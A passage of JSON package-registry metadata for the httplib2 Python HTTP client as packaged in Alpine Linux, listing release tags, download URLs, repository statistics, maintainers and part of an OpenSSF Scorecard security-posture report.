/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T07:44:46.353Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":27.061059634117367,"stargazers_count":3.3499643620812543,"forks_count":2.3521026372059874,"average":8.190781658351153},"purl":"pkg:apk/alpine/py2-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.6","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py2-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py2-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py2-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py2-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py2-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py2-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py2-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py2-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages/py2-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":213,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T12:08:34.070Z","updated_at":"2023-02-01T12:08:34.070Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.6","url":"https://pkgs.alpinelinux.org/packages?branch=v3.6","ecosystem":"alpine","default":false,"packages_count":8418,"maintainers_count":115,"namespaces_count":2,"keywords_count":564,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":255},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.872Z","updated_at":"2026-08-10T05:08:21.364Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.6/namespaces"}},{"id":8676980,"name":"py3-httplib2-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-httplib2","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_number":"0.22.0-r1","last_synced_at":"2026-03-10T13:08:38.866Z","created_at":"2023-12-20T10:27:51.040Z","updated_at":"2026-08-22T11:01:28.501Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.19/community/x86_64/py3-httplib2-pyc","install_command":"apk add py3-httplib2-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: 